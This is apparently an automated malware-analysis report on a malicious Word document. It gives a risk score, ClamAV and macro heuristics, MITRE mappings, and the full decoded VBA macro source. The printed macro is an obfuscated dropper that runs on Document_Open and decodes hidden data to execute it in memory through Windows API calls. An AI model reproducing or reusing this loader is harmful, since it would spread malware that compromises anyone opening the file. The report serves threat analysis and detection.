MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, as indicated by the 'OLE_VBA_MACROS' and 'ClamAV: Doc.Dropper.Agent-6352658-0' heuristics. The 'Document_Open' macro suggests an attempt to execute malicious code upon opening. The VBA script appears to be obfuscated but likely functions as a downloader for a second-stage payload, a common tactic for malware distribution.
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6352658-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6352658-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() Dim intersexual As Variant -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8449 bytes |
SHA-256: 2ae0f20f1483c4a62fdd9c1397e927f17cb285869f181fc2255d405121d719ed |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "abodule"
Function contaminated(pistol, polka)
Dim elephant(255) As Byte
restcure = 83 - 47 + 29
Do While restcure <= 90 + 1
elephant(restcure) = restcure - 65
restcure = restcure + 1
Loop
restcure = 48
Do While restcure <= 50 + 8
elephant(restcure) = restcure + 4
restcure = restcure + 1
Loop
restcure = 97
Do While restcure <= 120 + 3
elephant(restcure) = restcure - 71
restcure = restcure + 1
Loop
elephant(47) = 63
restcure = 43
elephant(restcure) = 60 + 2
contaminated = elephant
End Function
Function aperit(detonative)
aperit = AscW(detonative)
End Function
Attribute VB_Name = "Module1"
Function schsfe(puncuality, resuspension, carassius)
If carassius = 47 + (10 / 2 - 5) Then
potolok = puncuality \ resuspension
ElseIf carassius = 57 + (5 - 3) / 2 - 1 Then
potolok = puncuality And resuspension
ElseIf carassius = 65 + (56 / 7 - 4 * 2) Then
potolok = puncuality * resuspension
End If
schsfe = potolok
End Function
' The moon went hiding, stars quit shining
' Rain was driving, thunder, lightning
Function caltrop(inseverable) As String
Dim breadline(6962) As Byte
Dim briefing As Long
Dim impropriety As Long
Dim osutrigger As Long
Dim elief(63) As Long
Dim mantinea As Long
Dim alar() As Byte
Dim achievable(63) As Long
Dim constitution(63) As Long
Dim anguilliform() As Byte
anguilliform = VBA.StrConv(inseverable, 128)
Pmt 0, 100, 8371, 34078, 5
quickscented = vbKeyShift - 12
For desmodus = (20 - 4 * 5) To 7800 + 43
If (desmodus Mod 2 = (5 - 5)) Then
anguilliform(desmodus) = anguilliform(desmodus) - quickscented
ElseIf Not (desmodus Mod 2 = (4 - 4)) Then
anguilliform(desmodus) = anguilliform(desmodus) - (quickscented - 1)
End If
Next desmodus
Pmt 0, 76, 37014, 55110, 4
biplicity = abodule.contaminated(400, 20)
For osutrigger = (7 - 7) * 1 To (50 + 13) * (5 - 4)
achievable(osutrigger) = _
schsfe(osutrigger, _
51 - 73 + 86, _
65)
constitution(osutrigger) = _
schsfe(osutrigger, 112 - 102 + 4086, 65)
elief(osutrigger) = schsfe(osutrigger, 88 - 47 + 262103, 65)
Next osutrigger
Pmt 0, 84, 35877, 21541, 7
alar = anguilliform
Pmt 0, 76, 23498, 15343, 6
accordance = 100 - 56 - 41
giantism = 67 - 40 - 25
For briefing = (4 - 4) To 7800 + 43
bumpy = alar(briefing)
headquarters = alar(briefing + 2)
hilar = constitution(biplicity(alar(briefing + 1)))
dioscorea = achievable(biplicity(headquarters)) + _
biplicity(alar(briefing + accordance))
mantinea = elief(biplicity(bumpy)) + hilar + dioscorea
osutrigger = schsfe(mantinea, 55 - 126 + 16711751, 50 + 7)
breadline(impropriety) = schsfe(osutrigger, 65 - 101 + 65572, 40 + 7)
osutrigger = schsfe(mantinea, 118 - 18 + 65180, 50 + 7)
breadline(impropriety + 1) = schsfe(osutrigger, 35 - 84 + 305, 47)
breadline(impropriety + giantism) = schsfe(mantinea, 94 - 68 + 229, 57)
impropriety = impropriety + giantism + 1
briefing = briefing + 3
Next
caltrop = breadline
End Function
Attribute VB_Name = "Module2"
Function incapable(sapiens)
Dim belligerently As Variant
Dim catwalk As Integer
Dim chaucer As Byte
Dim appositively As Long
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim myxomatosis As Long
Dim sedition As LongPtr
mendacious = 102 - 52 - 42
Dim brimstone As LongPtr
Dim desecration As Byte
Dim modernism As Variant
Dim accouplement As LongPtr
Dim valueless As Byte
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim sedition As Long
mendacious = 118 - 111 - 3
Dim brimstone As Long
Dim accouplement As Long
#End If
nephrolithiasis = VarPtr(sedition)
sermonize = extend(nephrolithiasis, VarPtr(sapiens) + 8, mendacious)
tarahumara = 79 - 106 + 26
brimstone = 25 - 45 + 20
archeologist = 20 - 77 + 57
accouplement = 1 - 72 + 10007
addressed = 52 - 38 + 4082
sarcosome = 53 - 88 + 99
tetonnement = genitalia(ByVal tarahumara, _
brimstone, ByVal archeologist, accouplement, ByVal addressed, _
ByVal sarcosome)
yam = yam
expressionism = "beardless"
extend brimstone, sedition, 124 - 46 + 5805
imbibe = 30 + 1
misunderstood = 39330 + 0
gazebo = 416070 + 1
Pmt 0, imbibe, 11127, 12298, 4
incapable = brimstone
End Function
Function avuncular()
Dim musclebound As String
Dim ranking As Long
leptodactylus.buteonine.Value = Day(#12/5/2013#)
varday = asperous = "monstrous"
disgustedly = humphrey
marginally = geebung
explication = "momentous"
colostrum = calcaneal
donatus = actor
naproxen = "unconscious"
yaffle = "memorial"
Set towith = leptodactylus.buteonine.SelectedItem
anguished = 74
adad = 16881
adynamia = 231668
Pmt 0, anguished, 17696, 54956, 5
cutout = towith.Name
sublineation = 52 - 24 + 7816
acetal = Right(cutout, sublineation)
fagales = Module1.caltrop(acetal)
adult = 60
increment = 34263
acroclinium = 486856
Pmt 0, adult, 3783, 38171, 2
fendre = "astrologer"
wench = "macrocheira"
#If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then
Dim sulkiness As Long
Dim nonreciprocating As LongPtr
Dim crossbones As LongPtr
Dim afghani As Integer
Dim carol As String
Dim medley As LongPtr
Dim blather As LongPtr
Dim flageolet As LongPtr
unjustifiable = 74 - 85 + 2075
#End If
#If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then
Dim de As Variant
Dim crossbones As Long
Dim goodlooking As Byte
Dim nonreciprocating As Long
Dim medley As Long
extinguish = 120 - 90 + 751
Dim blather As Long
Dim flageolet As Long
unjustifiable = extinguish + 3459
#End If
nursing = 10 - 79 + 69
halfholiday = "plaster"
hypovolemia = 114 - 38 + 4020
inshore = 5
exude = 7913
filariid = 572397
Pmt 0, inshore, 22828, 17760, 6
forfend = millettia
corpulence = "changeful"
disdainful = "managed"
indeterminate = 103
mystery = 16919
annex = 300455
Pmt 0, indeterminate, 24790, 33813, 5
epidiascope = fagales
golden = "adultness"
nonreciprocating = incapable(epidiascope)
coryphaenidae = "statistical"
annular = "status"
Dim obduration As String
Dim abattoir As Integer
medley = 8 - 110 + 102
crossbones = nonreciprocating + unjustifiable
blather = 116 - 50 + 201461
flageolet = 105 - 64 + 3459
nazism = ensign(blather, medley, crossbones, medley, medley, medley, medley)
axenic = 24
arctium = 17955
churchill = 492273
Pmt 0, axenic, 25360, 47372, 7
End Function
Attribute VB_Name = "Module3"
Function extend(horsecar, somatic, forewing)
#If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then
Dim alca As Byte
Dim ordo As Variant
Dim accused As LongPtr
Dim neurasthenia As LongPtr
Dim monopteral As LongPtr
Dim buganda As Long
Dim afoot As LongPtr
Dim airliner As LongPtr
#End If
#If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then
Dim neurasthenia As Long
Dim callboard As Integer
Dim accused As Long
Dim snowplow As String
Dim afoot As Long
Dim overtaken As Integer
Dim monopteral As Long
Dim bimonthly As Long
Dim airliner As Long
Dim argosy As Byte
Dim endlessly As String
#End If
elephantus = Math.Round(435)
expressionism = "underling"
neurasthenia = horsecar
airliner = forewing
yam = "frappe"
afoot = somatic
selfworship = 110 + 4
gest = 6360 + 2
ceremony = 404330 + 7
Pmt 0, selfworship, 5176, 35668, 8
expressionism = "caliche"
accused = 33 - 66 + 32
crosstalk ByVal accused, neurasthenia, afoot, airliner, monopteral
expressionism = expressionism
End Function
Attribute VB_Name = "Module4"
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim intersexual As Variant
Dim hyetography As Variant
unpretentiousness = "dawdler"
kittentails = "astrocytic"
avuncular
coelo = 40 + 8
disfigurement = 20980 + 7
adhibition = 587870 + 0
Pmt 0, coelo, 16481, 36653, 8
End Sub
Attribute VB_Name = "leptodactylus"
Attribute VB_Base = "0{B561C2D5-313D-4B73-9326-29B8460ACA37}{2FB88A8C-084A-4D7B-98CC-FCE0D0AA7F5D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.